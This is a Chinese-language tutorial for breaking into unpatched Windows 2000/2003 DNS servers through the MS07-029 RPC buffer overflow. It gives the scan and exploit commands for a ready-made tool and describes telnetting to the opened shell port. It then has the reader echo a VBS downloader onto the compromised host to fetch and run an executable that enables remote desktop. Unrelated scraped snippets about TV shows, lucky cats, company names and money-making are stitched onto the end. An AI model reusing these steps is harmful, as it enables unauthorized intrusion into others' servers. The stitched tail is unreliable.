前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:
这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!
先用它来对主机进行扫描:
在我们的命令行下输入:“dns –s 目标IP地址”
稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,
如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100
我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389,
在命令行里输入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >>tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>tony.vbs
大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs
然后把开3389的工具上传到你的个人空间,
我这里用的是火狐开3389的工具,在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe
11月28日,音乐旅行节目《美好的时光》将迎来第九期,李荣浩回归好的乐队,与汪苏泷、陈立农前往滨海休闲城市广东汕尾,邂逅崭新的音乐际遇。节目所有正版音源将同步上线官方合作平台酷狗音乐,跟随好的乐队一起...
招财猫举左手表示(招财猫的由来?其左手和右手有什么意义呢?) 说到招财猫,想必大家都不陌生。 招财猫多是以陶器或瓷器的形式出现,此外还有玩偶、钥匙圈等各种招财猫周边。形态上,有举左手的,有举右百思...
响亮两个字商务处事公司取名名字大全打分 生手商务处事公司 17.2分 后人商务处事公司 43.41分 形体商务处事公司 52.33分 概观商务处事公司 50.29分...
随着网络的普及,现在越来越多人在网络上赚钱了,网络上赚钱的方法有很多,总有一种适合你。小编为你推荐十种网络赚钱方式,一起来看看吧。 推荐十种网络赚钱方式 1、翻译 假如你自个的言语能力比...
技术相对来说我们只要列出功能要求,然后去实现就可以了,可是用户的心理活动,是我们需要反复总结揣摩的。 要知道客户访问中会遇到那些问题 我们在进行每一个页面设计的时候,要充分的进行调研或者说是从客户...
本文导读目录: 1、脱口秀大会第四季第一期怎么没了 2、《脱口秀大会4》:邱瑞在节目里的内容被删除,删除了的内容是什么? 3、黑客与程序员的区别? 4、给点关于 程序员 黑客 之类的电影给...